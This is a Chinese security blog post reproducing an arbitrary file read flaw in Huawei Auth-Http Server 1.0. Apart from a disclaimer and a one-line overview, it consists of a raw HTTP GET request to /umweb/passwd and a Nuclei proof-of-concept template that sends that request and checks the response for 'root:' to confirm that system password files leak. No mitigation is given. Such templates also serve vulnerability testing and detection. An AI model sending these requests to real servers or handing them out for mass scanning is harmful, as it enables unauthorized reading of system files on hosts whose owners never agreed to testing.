「漏洞复现」华为Auth-Http服务存在任意文件读取

发布于 作者:

「漏洞复现」华为Auth-Http服务存在任意文件读取

原创 rain 知黑守白 2023-11-25 08:00

免责声明

此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时联系我们。谢谢!

漏洞概述

华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。

漏洞复现 

GET /umweb/passwd HTTP/1.1
Host: 
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9

NUCLEI POC 

id: huawei-auth-http-server-filereadd
info:
  name: 华为Auth-Http服务存在任意文件读取
  author: rain
  severity: high
  description: 华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件。
  tags:
    - file-read
    - huawei
    - auth-http

requests:
  - raw:
      - |
        GET /umweb/passwd HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"
        sec-ch-ua-mobile: ?0
        sec-ch-ua-platform: "Windows"
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains(body,"root:")'